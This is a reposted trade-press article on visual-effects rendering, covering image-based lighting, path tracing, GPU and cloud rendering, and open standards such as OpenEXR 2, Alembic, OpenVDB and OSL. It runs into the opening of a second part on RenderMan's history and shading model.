    To that end Snow also pioneered with films like Iron Man 2 not only having the IBL with its lights effectively at infinity but cutting out the lights from the IBL and placing them correctly in the scene. “I do like the flexibility of isolating the lights from that fixed environment and put them on sources a bit closer.” The lights are then painted out of the IBL dome or sphere. This is significantly different from painting the dome as in the examples above. With Snow’s and ILM’s approach the light level remains the same but now the HDR light is no longer sitting on the dome but on a card in the room.

    IBL

    In the IBL cases above, we have been referring to the use of IBL primarily for external open environment lighting, but it is very important to understand the move pioneered by ILM in removing or cutting lights from the ‘infinite’ distant dome and for interior scenes placing those HDR lights on cards in the physical space of the real world dimensions of say a 3D room. “If everything is at an infinite distance your character is not going to move through the scene, it’s not going to move through the lights,” Snow points out.

    HDR from on set of Iron Man 2 : ILM

    The Iron Man 2 pipeline was a key point in translating these concepts into a more image based lighting system.

    With Iron Man 2 the ILM team was much more accurately recording the HDRs on set and doing much more accurate HDRs at multiple points on the set. This lead to combining several technologies and the work of several departments to produce HDR IBL environments build with multiple HDRs.

    Created from three separate 360 HDRs : ILM

    Right is a working layout of the Iron Man set, with multiple HDRa and internally separated and correctly positioned lights.

    In addition to introducing additional lighting elements – the HDR lights produce energy conserving proximity lighting to any digital characters.

    ILM’s work in this area has since advanced even further and the techniques have been widely adopted by others in the industry.


    1.4 Interactivity

    In addition to the problem of final rendering, there has been a lot of focus on producing a more interactive experience for artists, providing more of a final preview that, in many cases, if left to run will converge to the same final quality as the primary renderer.

    There are many scan line and hybrid render approaches to fast rendering. In the area of ray tracing most companies opt for a fast path tracing solution. This is in part due to render speed and part due to human perception. The way the image forms with path tracing – while still noisy – appears to be more readable and pleasant to artists, allowing them for the same render budget (or time) to see better what the final result will look like.

    This compares with traditional distributed ray tracing which has been popular since the 80s. With path tracing less branches are presented by sub-division and thus the information comes in more in point form visually to the artist. This difference between blocky and noisy allows quicker appreciation for the final for many artists – regardless of path tracing’s speed in pure isolated terms.

    Below is an example of re-rendering in RenderMan comparing distributed ray tracing with the newer path tracer by Christos Obretenov (LollipopShaders and fxphd.com Prof.) for fxguide. The absolute times should not be taken as any render test, they are just recorded to show how each version looked at the same point in time.

    Click for very large version (2k) to see the detail.

    Click for very large version (2k) to see the detail.

    While the image starts to become recognizable after only a few samples per pixel, perhaps 100 for the image to “converge” and reduce noise to acceptable levels usually takes around 5000 samples for most images, and many more for pathological cases.


    1.5 GPU

    GPU rendering is a huge topic, perviously while GPUs were seen as good for some things, such as pre-render passes as is the case with Weta Digital and Panata-Ray and their use of spherical harmonics (see our fxguide story on Weta’s impressive Panta Ray), it was not seen as a viable option for production rendering. This has changed, and now not only are there GPU options at the workstation level such as Octane by Otoy but also cloud based rendering on GPUs with Nivida and Octane and complete remote rendering options that remove any workstation rendering heavy lifting such as Lagoa.

    © 2009 Twentieth Century Fox Film Corporation.  All rights reserved.

    A still from Avatar by Weta Digital (Panta Ray). © 2009 Twentieth Century Fox Film Corporation. All rights reserved.

    One issue in the GPU world is the split between CUDA (Nvidia only) and the open source but perhaps less popular OpenCL environments. The rendering sector is no different, mirroring the divide in the larger GPU community.

    Next Limit for example is following the CUDA/OpenCL situation, and would certainly consider down the road exploring new platforms like GPU if the landscape stabilized. “We are paying a lot of attention to how it is evolving and eventually we will expand Maxwell, if it doesn’t mean sacrificing quality or functionality,” says Next Limit’s Juan Canada.

    The trend is heavily established regardless of a move to more and more GPU experimentation. While the major renderers require CPU, the move to mobile computing is fanning the need to render faster, and the limits of GPU rendering are also retreating. A few years ago GPU renders looked ‘game like’ and were easy to spot compared to production renderers, and this might still be true in some realtime applications especially for SSS and complex characters, but the gap has shrunk dramatically. For many non-realtime application, it is virtually impossible to pick GPU from CPU for certain types of shots.

    Programming GPUs remains somewhat challenging as code can sometimes need to be very specific to individual hardware revisions, and memory limitations for production renderers can be a real issue. In addition, not all algorithms are GPU friendly meaning that not all problems are suited to the architecture of a GPU.

    The economies of scale in mobile computing and real time gaming are driving forward the technology constantly. One of the most impressive displays of the state of the art of GPU rendering will be at the annual RealTime Live SIGGRAPH presentation next week in Anaheim. An international jury has selected submissions from a diverse array of industries to create a fast-paced, 45-minute show of aesthetically stimulating real-time work.



    1.6 Farm and cloud rendering

    Rendered with Otoy's octane

    Rendered with Otoy’s octane

    As one can see in part 2 of the State of Rendering- in the individual product renderer section, some new renderers are completely cloud based having left behind any notion of local rendering (see Lagoa) while others offer both local and farm rendering (see Octane-Otoy). For most renderers there is a desire to work with third party companies to allow rendering in the cloud. The only exception was Lightwave’s (NewTek’s) Rob Powers who while, not against it, surprisingly questioned its economic value in an age of cheap PCs and low cost render licenses. For everyone else the logic is many fold:

    • companies – especially smaller to medium size companies want to be able to ramp up and down quickly. Workloads are lumpy and why maintain a farm when it only rarely needs to be pushed to capacity?
    • renderfarms require physical space, serious air conditioning, consume large amounts of power (use and air con) and thus are expensive to run, no matter how cheap the machines
    • Amazon and other services have provided a vast cloud computing environment at low cost per hour
    • security issues have been addressed so clients are not as worried about leaks
    • internet speeds are allowing meaningful connections for large scenes
    • margins are tight and reducing capital expenditure and making it job based is good business practice
    lagoas

    Lagoa UI – Cloud rendering and cloud based

    Rendered via ZYNC. Courtesy of ZERO VFX.

    Rendered via ZYNC. Courtesy of ZERO VFX.

    Specialist companies like ZYNC and Green Button have sprung up to service our industry with a real understanding of security issues and comprehensive licensing solutions. (see our ZYNC story here). For example both ZYNC and Green Button now support V-Ray, and Chaos has a special cloud renderer for anyone else looking to set up cloud rendering. In fact the company points out it could be cloud enabled. “It’s really pretty interesting!” comments Lon Grohs, business development manager, Chaos Group.

    Companies like Chaos Group/V-Ray, Pixar/RenderMan and the Foundry (with Nuke) have been quick to support these farm cloud solutions. In turn companies like Zero VFX are using it very successfully and Atomic Fiction have completely avoided in-house render farms – their entire equipment room is a wall plug to the internet.


    1.7 Open source

    OpenVDB, Alembic, OpenExr 2, Open Shader Language (OSL), Cortex and other open source initiatives have really taken off in the last few years. For some companies this is a great opportunity, for a few others they are considering them but have higher priorities, but no one is ignoring them.

    A scene from The Croods.

    A scene from The Croods using OpenVDB.

    With online communities and tools such as GitHub, people around the world have worked together to move in-house projects and standardizations into the public open source community. While most of this is based on genuine community motivation, the growth of patent trolls and the costs of isolated development have also contributed.

    The Foundry's Jack Gre

    The Foundry’s Jack Greasley demoing Mari recently

    Companies such as The Foundry, who excel at commercializing in-house projects into main stream products such as Nuke, Katana, Mari and now FLIX have also been key in adopting and helping to ratify standards such as ColorIO, Alembic and OpenEXR 2. This partnership between the vendors and the big facilities has huge advantages for the smaller players also. Several smaller render companies expressed complete support for such open standards, one might even say exuberance, since they feel they can not complete with the big companies, but when open standards are adopted it allows smaller player to correctly and neatly fit into bigger production pipelines. In reference to open source in general, Juan Cañada, the Head of Maxwell Render Technology, commented “this is something we have been praying for.  We are not Autodesk, we are not even The Foundry. We are smaller, and we are never force people to use just our file formats, or a proprietary approach to anything, so anything that is close to a standard for us is a blessing. As soon as Alembic came along we supported that, the same with Open VDB, OpenEXR etc. For a medium sized company like us, it is super important that people follow standards, and from the user’s point of view we understand this is even more important. It is critical. We have committed ourselves to follow standards as much as possible.”

    Below are some of the key open source initiatives that are relevant to rendering that we have not included in our round-up of the main players (see part 2), but will be covered from SIGGRAPH, and others that were just excluded due to current levels of adoption such as OpenGL (Caustic by Imagination) which is supported by Brazil only currently as we understand, but aims to aid in GPU and CPU low level levels of abstraction for ray tracing.

    1.7.1. OpenEXR 2 (major support from ILM)

    The most powerful and valuable open source standard that has impacted rendering would have to be the OpenEXR and OpenEXR 2 file formats. Really containers of data, this format has exploded as the floating point file format of choice and in recent time expanded further to cover stereo and storing of deep color or deep compositing data. The near universal acceptance of OpenEXR as the floating point big brother of the DPX/Cineon file format/data container has been a the lighthouse of inspiration that has fathered so much of the open source community in our field. But more than that, it has been central to the collaborative workflow that allows facilities all over the world to work together. Steered and supported by ILM and added to by Weta Digital, arguably the two most important visual effects facilities in the world, the standard has been successful and been expanded to be kept relevant.

    OpenEXR 2.0 was recently released with major work from Weta and ILM. It contains:

    • Deep Data support – Pixels can now store a variable-length list of samples. The main rationale behind deep images is to enable the storage of multiple values at different depths for each pixel. OpenEXR 2.0 supports both hard-surface and volumetric representations for Deep Compositing workflows Deep Color.
    • Multi-part Image Files  (including Stereo support) – With OpenEXR 2.0, files can now contain a number of separate, but related, data parts in one file. Access to any part is independent of the others, pixels from parts that are not required in the current operation don’t need to be accessed, resulting in quicker read times when accessing only a subset of channels. The multipart interface also incorporates support for Stereo images where views are stored in separate parts. This makes stereo OpenEXR 2.0 files significantly faster to work with than the previous multiview support in OpenEXR.
    • Optimized pixel reading – decoding RGB(A) scanline images has been accelerated on SSE processors providing a significant speedup when reading both old and new format images, including multipart and multiview files.

    Although OpenEXR 2.0 is a major version update, files created by the new library that don’t exercise the new feature set are completely backwards compatible with previous versions of the library.

    Weta uses Deep Compositing with RenderMan

    Weta Digital uses deep compositing with RenderMan: Man of Steel (2013).

    RenderMan from Pixar fully supports deep color and they have worked very successfully with Weta Digital who use deep color on most if not now all productions including the complex work for the battle on Krypton for Man of Steel.

    Arnold does not ‘out of the box’ support deep color / deep data compositing but for select clients such as ILM they have developed special pipelines for shows such as Pacific Rim. It is Solid Angle’s intention to implement this more widely in a future version of Arnold. Next Limit have already implemented deep color into Maxwell Render and it is currently in Beta to be shipping with the new Release 3.0 around October hopefully (along with Alembic, OpenEXR 2.0 etc Next limit is committed to open source generally).

    Side Effects Software’s Houdini is another open source supporter. “We are really excited about all the open source stuff that is coming out especially the Alembic, OpenVDB and OpenEXR 2, and the fact that the deep images support is there in OpenEXR 2.0 makes it really great for composting volumes and the other things Houdini is go good at,” explains Mark Elendt, senior mathematician and very senior Side Effects team member, talking about Houdini’s forthcoming full support of OpenEXR 2.0. Deep compositing was driven by Weta, ILM and also The Foundry for Nuke compositing. But Nuke is scanline based and Side Effects is tile based, so there was a whole section of the spec and implementation that was somewhat untested. Side Effects worked very closely with the OpenEXR group to make sure the deep compositing workflow worked well with Houdini and other titled solutions.

    1.7.2. Alembic (major support from SPI/ILM)

    alembicAlembic has swept through the industry as one of the great success stories of open source. The baked out geometric process provided reducing complexity and file size and passed on a powerful but simplified version of an animation, or performance. All in an agreed standardized file format. It has been welcomed in almost every section of the rendering community. It allows for better file exchange between facilities and better integration and faster operation inside facilities. Since its launch at Siggraph 2010 and its public release at Siggraph 2011 (see our coverage and video from the event) both facilities and equipment manufacturers have embraced it.

    Alembic is:

    1. fast 
    2. efficient
    3. reliable

    Alembic reduces data replication, and just this feature gave 48% disc reduction improvements in say Men in Black 3 (an Imageworks show). ILM first adopted it studio wide for their pipeline refresh as part of gearing up for the original Avengers, and they have used it ever since. And it is easy to see why SPI saw files on some productions drop from 87 gig to 173MB.

    Alembic was helmed by a joint effort from ILM and Sony, spearheaded by Tony Burnette and Rob Bredow – the two company’s respective CTOs. Together they put forward a killer production solution with a strong code base contributed to by many other studios and from the commercial partners such as Pixar, The Foundry, Solid Angle, Autodesk and others. With product implementations such as Maya, Houdini, RenderMan, Arnold and Katana all joining from the outset. Since then most other renderers have moved to support Alembic. Not all but most major packages now support Alembic.

    Alembic 1.5 will be released at SIGGRAPH 2013 with a new support for muli-threading. This new version includes support for the Ogawa libraries. This new approach means significant improvements, unofficially:

    1) File sizes are on av. 5-15% smaller. Scenes with many small objects should see even greater reductions
    2) Single-threaded reads average around 4x faster
    3) Multi-threaded reads can improve by 25x  (on 8 core systems)

    Key developers seem pretty enthusiastic about it. Commenting on the next release, Mark Elendt from Side Effects says “it uses their Ogawa libraries, which is a huge efficiency over the HDF5 implementation that they had.”

    The new system will maintain backwards compatibility. The official details should be published at SIGGRAPH 2013. Also being shown at SIGGRAPH is V-Ray’s support of Alembic which is already in alpha or beta stage testing. Already for key customers “on our nightly builds we have Alembic support and OpenEXR 2 support,” commented Lon Grohs, business development manager of Chaos Group.

    1.7.3. OpenVDB (major support from Dreamworks Animation)

    OpenVDB is an open source (C++ library) standard for a new hierarchical data structure and a suite of tools for the efficient storage and manipulation of sparse volumetric data discretized on three-dimensional grids. In other words, it helps with volume rendering by being a better way to store volumetric data and access it. It comes with some great features, not the least of which is that it allows for an infinite volume, something hard to store normally (!).

    A scene from DreamWorks Animation's Puss in Boots.

    A scene from DreamWorks Animation’s Puss in Boots.

    It was developed and is supported by DreamWorks Animation, who use it in their volumetric applications in feature film production.

    OpenVDB was developed by Ken Museth from DreamWorks Animation. He points out that for dense volumes you can have a huge memory overhead and it is slow to traverse the voxels when ray tracing. To solve this people turned to spare data storage. One only stores exactly what one needs, but then the problem is finding data in this new data structure.

    There are two main methods commonly used by ray tracing now, the first is an Octree (Brick Maps in RenderMan for example use this effectively for Surfaces). While this is a common solution with volumes these can get very “tall”, meaning that it is a long way from the root of the data to the leaf. Therefore, a long data traversal equals slow ray tracing especially for random access. The second is a Tile Grid approach. This is much “flatter” where there is just the root and immediately the leaf data, but it does not scale as it is a wide table. OpenVDB tries to balance these two methods by producing a fast data transversal, rarely requiring more than 4 levels and is also scalable. This is needed as a volumetric data set as it can easily be tens of thousands of voxels or more. While this idea to employ a shallow wide tree, a so-called B+ Tree, has been used in databases such as Oracle and file systems (i.e. NFTS), OpenVDB is the first to apply it to the problem of compact and fast volumes.

    Puss in Boots cloud environment.

    Puss in Boots cloud environment.

    On top of this OpenVDB provides a range of tools to work with the data structure.

    The result of implementing OpenVDB is:

    1. Very fast access/processing
    2. Very small memory footprint

    Just how small? The memory footprint of one Dreamworks Animation model dropped from 1/2 a terabyte to less than a few hundred megabytes. And a fluid simulation skinning (polygonization) operation that took an earlier Houdini version some 30 minutes per section, (and it had to be split into bins for memory reasons) – “with OpenVDB it could all be done in around 10 seconds,” says Museth.

    An additional advantage is that the volume can be dynamic (vs static) which lends itself very well for fluids of smoke etc.

    (Click here for Museth’s SIGGRAPH 2013 paper)

    OpenVDB has had rapid adoption, most noticeably by Side Effects Software who were first to publicly back the initiative, and additionally by Solid Angle (Arnold) and Pixar (RenderMan).

    “The ease of integration was a huge factor in enabling us to introduce OpenVDB support,” says
    Chris Ford, RenderMan Business Director at Pixar Animation Studios. “The API is well thought
    out and enabled us to support the rendering requirements we think our customers need. The
    performance from threading and compact memory footprint is icing on the cake.”

    “In addition to our Arnold core and Houdini-to-Arnold support of OpenVDB, we’re also pleased
    to announce planned support in Maya-to-Arnold and Softimage-to-Arnold package plugins,” said
    Marcos Fajardo, Solid Angle.

    The use of DreamWorks Animation’s OpenVDB in Houdini  was a key component to producing the many environmental effects in DreamWorks Animation’s movies, The Croods. “The complexity of our clouds, explosions, and other volumetric effects could not have been done without the VDB Tools in Houdini,” said Matt Baer, Head of Effects for The Croods.

    “The response to OpenVDB is overwhelmingly positive,” said Lincoln Wallen, CTO at DreamWorks Animation. “Feedback from our partners and the community has helped the team refine the toolset and create a robust release that is poised to set an industry standard.”

    OpenVDB uses a very efficient narrow-band sparse data format. “This means that OpenVDB volumes have an extremely efficient in-memory data structure that let them represent unbounded volumes. The fact that the volumes are unbounded is really key. If you think of volumes as 3D texture maps, unbounded volumes are like having a texture map that can have infinite resolution” explained Mark Elendt from Side Effects Software.

    Side Effects found it was fairly easy to integrate OpenVDB into their existing modeling and rendering pipelines. “When we plugged VDB into Mantra’s existing volumetric architecture we could immediately use all the shading and rendering techniques that had been built around traditional volumes, such as volumetric area lights. Thanks to OpenVDB’s efficient data structures we can now model and render much higher fidelity volumes than ever before” he said.

    For more information click here.

    1.7.4. OSL – Open Shading Language (major support from SPI)

    oslAt last year’s SIGGRAPH in a special interest group meeting that SIGGRAPH calls “Birds of a Feather” around Alembic, Rob Bredow, CTO SPI asked the packed meeting room how many people used Alembic. A vast array of hands shot up, which given the steering role of SPI clearly pleased Bredow. It was not so much the same response from the same question on OSL. At the time Sony Pictures Imageworks used OSL internally and at the show Bill Collis committed The Foundry to exploring it with Katana, but there was no wide spread groundswell seen around say Alembic.

    Run the clock forward a year and the situation has changed or is about to change, fairly dramatically. Key renderer V-Ray has announced OSL support. “OSL support is already ready and in the nightly builds, and should be announced with version 3.0, says Chaos Group’s Grohs. “We have found artists tend to gravitate to OpenSource and we get demands which we try and support.”

    As has Autodesk’s Beast (a game asset renderer – ex Turtle Renderer) and Blender, but there is more on the way and while it is not a slam dunk, OSL is in striking distance of a tipping point that could see wide scale adoption of OSL, which in turn would be thanks to people like Bredow who is a real champion of open source and one of the most influential CTO’s in the world in this respect.

    “OSL has been a real success for us so far,” says Bredow. “With the delivery of MIB3 and The Amazing Spider-Man and now Smurf’s 2 and Cloudy with a Chance of Meatballs 2 on their way, OSL is now a production-proven shading system. Not only are the OSL shaders much faster to write, they actually execute significantly faster than our old hand-coded C and C++ shaders. Our shader writers are now focused on innovation and real production challenges, rather than spending a lot of time chasing compiler configurations!” – Bredow explained to fxguide from location in Africa last week. 

    OSL usage and adoption is growing and importantly for any open source project it is moving from the primary supporter doing all the work to being a community project “We’re getting great contributions back from the developer community now as well” Bredow says.

    OSL does not have an open runway ahead. Some people believe the OSL is not wanted by their customers. “I have been to many film studios post merger, I’ve talked to a lot of customers and in the last 3 months I have done nothing but travel and visit people and not once has it come up,” explained Modo’s Brad Peebler. While the Foundry and Luxology very much support open source, they seem to have no interest in OSL.

    Others groups are exploring something similar to OSL but different. Some companies are considering Material Description Language (MDL) which is a sort of different approach to shaders being developed by Nvidia with iRay as explained by Autodesk’s rendering expert Håkan “Zap” Andersson. Zap as he likes to be known feels that OSL in general is a more modern and intelligent way to approach shading than traditional shaders but Nvidia is moving in a different direction again.

    “If you look at OSL there is no such thing as a light loop, no such things as tracing rays, you basically tell the renderer how much of ‘what kind of shading goes where,’” says Zap. “At the end of your shader there is not a bunch of code that loops through your lights or sends a bunch of rays…at the end instead of returning a color like a traditional shader does OSL returns something called a closure which is really just a list of shading that needs to be done at this point. It hands this to the renderer and the render makes intelligent decisions about this.” This pattern of moving smarts from shaders to the renderer. By contrast the Nvidia MDL is more of a way of passing to iRay a description of materials.

    “MDL is not a shading language as we would think of it, but rather a notation for iRay for describing materials: basically weighting BRDFs and setting their parameters,” says Bredow. “Since iRay doesn’t allow for programmable shaders the way we expect, it’s not really trying to solve the same problem.”

    Zap says the difference between MDL and OSL is a “little bit like 6 of one and half a dozen of the other.” While it is clear Autodesk has not decided to have a unified material system, one would have to expect that Nvidia would be very keen to get Autodesk on board. One would have to expect Autodesk, with multiple products, would benefit from having a unified shader language.

    SPI and the OSL community would of course be very happy to see Autodesk use OSL more widely in their products, as Autodesk only has Beast currently supporting it, and Autodesk is Nvidia’s biggest customer for Mental Ray. Zap would not be drawn on Autodesk’s preference to move more towards either MDL or OSL but one gets the distinct impression that the 3D powerhouse is actively exploring the implications for both. If Autodesk was to throw its weight behind something like OSL, it would be decisive for this long term adoption.   “I believe it would be a great fit across a wide array of their applications. I’d love for you to reach out to them directly as well as it would be great if they had more to share beyond Beast,” offered Bredow.

    Given Sony’s use of OSL, one might expect Solid Angle’s Arnold to support OSL, but as of now it does not. While the company is closely monitoring Sony’s use of OSL, Marcos Fajardo explains that “we are looking at it with a keen eye and I would like to do something about it – maybe next year,” but nothing is implemented right now.

    Many other companies who do not yet support OSL, such as Next Limit, are actively looking at OSL to perhaps support it in an upcoming release of Maxwell.

    1.7.5. Cortex (major support from Image Engine)

    Image Engine in collaboration with several other companies has been promoting a new system for visual effects support (C++ and Python modules) that provides a level of common abstraction while unifying a number of ways of rendering a range of common vfx problems in a similar way. Cortex is a suite of open source libraries providing a cross-application framework for computation and rendering. The Cortex group is not new but it has yet to reach critical mass, although as with many successful such projects it comes from being used in production and facing real world tests, particularly inside Image Engine which uses it to tackle problems it sees as normally being much bigger than a company their size could tackle. For example it provides a unified solution to fur/hair, crowds and procedural instancing. Image Engine used it most recently on Fast and Furious 6 – but it is used extensively inside Image Engine.

    John Haddon, R&D Programmer at Image Engine: “Cortex’s software components have broad applicability to a variety of visual effects development problems. It was developed primarily in-house at Image Engine and initially deployed on District 9. Since then, it has formed the backbone of the tools for all subsequent Image Engine projects, and has seen some use and development in other facilities around the globe.”

    stage1An example outside Image Engine was shown by Ollie Rankin, from Method Studios, who presented at an earlier SIGGRAPH Birds of Feather on Cortex and how it can be used in a crowd pipeline. He had used a typical Massive pipeline which involved Massive providing agent motivation, and yet they felt Massive was not ideal for procedural crowd placement. In a hack for the film Invictus, they used Houdini to place the Massive agents, and they rendered in Mantra.


    stage2

    The hack workaround that is very code and job specific

    Massive exports native RIB files and like RenderMan, Mantra would work with Massive and Mantra is very similar to RenderMan – but it was a hack introducing Houdini to just handle procedural placements and still gain agent animation from Massive. Massive provided just the moving, waving, cheering agents but their placement was all from Houdini as “we didn’t need Massive to distribute people into seats in a stadium – we knew exactly where the those seats where – all we needed was to turn those seat positions into people”. The rendering did require a bridge between Massive and Mantra, but with a custom memory hack using PRman’s dso (Dynamic Shared Object).

    “While we were happy with the way that Massive manipulates motion capture and happy with the animation it produces, we felt that its layout tools weren’t flexible enough for our needs”, Rankin told fxguide. “We realised that the challenge of filling a stadium with people essentially amounts to turning the known seat positions into people. We also wanted to be able to change the body type, clothing and behaviour of the people, either en masse or individually, without having to re-cache the whole crowd. We decided that a Houdini point cloud is the ideal metaphor for this type of crowd and set about building a suite of tools to manipulate point attributes that would represent body type, clothing and behaviour, using weighted random distributions, clumping and individual overrides.”

    They still needed a mechanism to turn points into people and this is where “we had to resort to a monumental hack.” Massive ships with a procedural DSO (Dynamic Shared Object) for RenderMan that can be used to inject geometry into a scene at render-time. It does so by calling Massive’s own libraries for geometry assignment, skeletal animation and skin deformation on a per-agent basis and delivering the resulting deformed geometry to the renderer. “Our hack was a plugin that would call the procedural, then intercept that geometry, straight out of RAM, and instead deliver it to Mantra,” Rankin explained


    Cortex solution

    Cortex solution

    By comparison a Cortex solution would allow a layer of Cortex procedural interface between Massive and RenderMan – it would access and query the Massive Crowd assets library and remove the need for the Houdini/PRman dso hack, but still allow Houdini render Massive’s agents. But once there is a unified standard cortex procedural hub, it is possible to replace say Houdini or update to a different renderer – all without breaking the custom black box hack that existed before.


    Moving foward - more flexibility and open to change

    Moving foward – more flexibility and open to change

    The same coding approach and API interface used in this example for solving Massive – Houdini could be used for Maya, Nuke or a range of other applications. By introducing a standardized Cortex layer,  geometry say could be generated at Render time in a host of situations but all deploying the same basic structure and not requiring new hacks each time or needing to be redone if a version of software changes or need to be replaced. This is just one example of a range of things Cortex is designed to help with layout, modeling, animation, deferred geomerty creation at render time. It can work in a wide variety of situations where interfaces between tools is needed in a production environment. More info click here

    1.7.6. OpenSubDiv (major support from Pixar)

    OpenSubdiv is a set of open source libraries that implement high-performance subdivision surface (subdiv) evaluation on massively parallel CPU and GPU architectures. This codepath is optimized for drawing deforming subdivs with static topology at interactive framerates. The resulting limit surface matches Pixar’s RenderMan to numerical precision. The code embodies decades of research and experience by Pixar, and a more recent and still active collaboration on fast GPU drawing between Microsoft Research and Pixar.

    multiplatform2OpenSubdiv is covered by an opensource license and is free to use for commercial or non-commercial use. This is the same code that Pixar uses internally for animated film production. Actually it was the short film Geri’s Game that first used subdivision surfaces at Pixar.See fxguide story including a link to the Siggraph paper explaining it.

    Pixar is targeting SIGGRAPH LA 2013 for release 2.0 of OpenSubdiv. The major feature of 2.0 will be the Evaluation (eval) api. This adds functionality to:

    • Evaluate the subdiv surface at an arbitrary parametric coordinate and return limit point/derivative/shading data.
    • Project points onto the subdiv limit and return parametric coordinates.
    • Intersect rays with subdiv limits.

    “We also expect further performance optimization in the GPU drawing code as the adaptive pathway matures” more information at the OpenSubDiv site.


    maxwell Forest

    Rendered in Maxwell Render.

    Read more on the State of Rendering in Part 2 …covering RenderMan, Arnold, V-Ray, Maxwell, Mantra, Modo, Lightwave, Mental Ray, 3Delight, finalRender, Octane, Clarisse iFX, Lagoa and Arion2. We also look and question the next stage of rendering.

    Plus the new term at fxphd.com covers rendering in more depth.

    Special thanks to Ian Failes.

    展开全文
  • The State of Rendering – Part 2

    千次阅读 2014-09-22 16:19:48
    In Part 1 of The State of Rendering, we looked at the latest trends in the visual effects industry including the move to physically plausible shading and ... Part 2 explores the major players

    In Part 1 of The State of Rendering, we looked at the latest trends in the visual effects industry including the move to physically plausible shading and lighting. Part 2 explores the major players in the current VFX and animation rendering markets and also looks at the future of rendering tech.

    There is more about rendering at www.fxphd.com this term.

    There are many renderers, of course, but we have focused below on the primary renderers that have come up during the last 18 months of writing fxguide stories. It is not an exact science but fxguide has a ring side seat on the industry and the list below covers the majority of key visual effects and non-exclusive in house animation renderers. We have excluded gaming engines and many fine non-vfx applications.

    The order is not in terms of market share – in reality the 3ds Max default renderer or Mental Ray would swamp many others due to the market share of Autodesk with Max, Maya and XSI. But the order does indicate a subjective rough grouping based on our feedback with major studios and artists around the world.


    2. Major players

    2.1 RenderMan – Pixar
    2.2 Arnold – Solid Angle
    2.3 V-Ray – Chaos Group
    2.4 Maxwell Render – Next Limit
    2.5 Mantra – Side Effects Software
    2.6 CINEMA 4D – Cinema4D
    2.7 Modo – The Foundry
    2.8 Lightwave – Newtek
    2.9 Mental Ray – Nvidia
    2.10 3Delight – DNA Research
    2.11 FinalRender – Cebas
    2.12 Octane – Otoy
    2.13 Clarisse iFX
    2.14 Lagoa


    2.1 RenderMan – Pixar

    fxguide will soon be publishing a piece on the 25th anniversary of RenderMan. In that story, we look back with contributions and interviews from Ed Catmull, Loren Carpenter and Rob Cook, each of them now senior managers or research fellows at Disney/Pixar but they were also the founding members of the team that developed RenderMan and defined a specification so far reaching the Pixar PRman implementation is able to be called the greatest renderer in the brief history of computer graphics. No other renderer has contributed so much, been used so widely or so long or been responsible for so much creative success as seen by the near endless stream of VFX Oscar winning films that have used it.

    Image by Pixar's Dylan Sisson. The left image uses image based lighting, with geometric area lights used for the right image. The same shaders are used for both images. Environment lights are used in both images, with one bounce color bleeding. On the right, the neon tubes are emissive geometry. 

    Image courtesy of Dylan Sisson, Pixar. The left image uses image based lighting, with geometric area lights used for the right image. The same shaders are used for both images. Environment lights are used in both images, with one bounce color bleeding. On the right, the neon tubes are emissive geometry.

    In those interviews and podcasts you can hear first hand about the evolution of the product and spec, but you will also hear about the leadership of Dana Batali. While RenderMan has many contributors and excellent researchers, Ed Catmull, President of Disney and Pixar, points out that one thing that has always been true behind the scenes and screens of RenderMan has been the lack of committee thinking. At the start, Catmull points out that, “we had Pat Hanahan as the lead architect on the design of RenderMan, and Pat is a remarkable person. I set up the structure so Pat made all the final calls, at the same time we involved as many companies as we could, 19 if I recall…and of those 6 or 7 were really heavy participants, but that being said, we gave the complete authority to make the final choice to a single person. And I think that was part of the success – that it has the integrity of the architecture that comes from a single person, while listening to everyone else.”

    Today there is also one man responsible for guiding the product, Dana Batali VP of RenderMan Products at Pixar. Ed Catmull explains: “The way it has developed is that we have given Dana a free hand in how the product develops, it isn’t as if he comes to me and says is it OK for us to put the following features in – he never asks. The charter is that he is meant to respond to what is needed. We set it up so they make changes to what is needed, they never ask me what should go in – they just do what the right thing is and we have doing that for many years.” In this respect today there is still one person with a single vision of what should be developed for RenderMan’s worldwide clients, including Disney/Pixar. “Yes, that is the set up and one I believe strongly in,” reinforces Catmull.

    Dana Batali in turn sees his role as just focusing the intense collaboration of the incredible team of scientists and researchers inside Pixar’s RenderMan development team based in Seattle. There is no doubt that team is exceptional, something easily judged by the volume of papers and published articles that has flowed from the team since it’s inception, much of it published at Siggraph as they will do again next week.

    fxguide has recently covered the advances in RenderMan’s use in Monsters University and the move to ray tracing with physically based shading and lighting, so for this article we decided to get very technical on the implications and implementations of the ray tracing framework in the current release and the upcoming new RPS18 release with Dana Batali.

    Art from Monsters University.

    Art from Monsters University.

    Background: traditional approach

    Some background, as RenderMan’s own notes point out, CGI rendering software approximates the rendering equation. This equation models the interaction of shape, materials, atmosphere, and light, and, like many physics-based formulations, takes the form of a complex multidimensional integral. The form of the equation is such that it can only be practically approximated. This is accomplished by applying generic numerical integration techniques to produce a solution. The goal of rendering algorithm R&D is to produce alternate formulations of the equation that offer computational or creative advantages over previous formulations.

    At the heart of the rendering equation is the description of how light is scattered when it arrives at a surface. The fundamental question is: what light is scattered to the eye at this point in the world? The portion of a rendering program focused on solving this problem can be called the surface shader, or the material integrator. In RenderMan, the canonical or idealized surface shader has traditionally been decomposed into a summation of the results of several independent integrators. In 1990, they represented a ‘theoretical-perfect” material as:

    Ci = Ka*ambient() + Kd*diffuse(N) + Ks*specular(I, N, roughness)

    Additional terms were later added to simulate incandescence and translucence, but, fundamentally, the simplicity and approximate nature of this formulation was driven by the computational resources available at the time.

    In 1987 the RenderMan Shader Language (RSL) was introduced.  And over the next few years until about 2002,  RSL evolves to include new techniques:  deep shadows, “magic lights”, more elaborate proceduralism.

    From 2002 to 2005 there are great advances but this second stage is very much a series of complex new approaches from different areas rather than one unified trend. For example during this period Ray tracing is added: gather(), transmission(), indirectdiffuse()  all extend the collection of “built-in integrators” (eg diffuse(), specular()). But also point-based subsurface scattering is added, which is a huge advance. From 2002 until the present new custom shaders implement things such as area lights with ray traced shadows, much of this ridding on the back of two key aspects:

    1. Techniques such as ray tracing  become more affordable due to moores law.
    2. Memory continues to grow, making the Reyes scene- memory approach less vital for complex scenes.

    By 2005, armed with significantly more computational resources, The RenderMan team could afford ever more accurate approximations to the physical laws. Rather than start afresh, new terms were added, evolving into a morass of interoperating illuminance loopsgather blocks, light categories, andindirectdiffuse calls. Moreover, the fact that many of these additions were point based solutions that meant pre-baked data, which in turn made rendering pipelines more complex and therefore difficult to maintain and comprehend.

    The third phase of “illumination-related technology” is the move to allowing much more pure Ray Tracing solutions, for example in 2011 a  pure raytraced subsurface scattering added, and the  introduction of the “raytrace hider”.

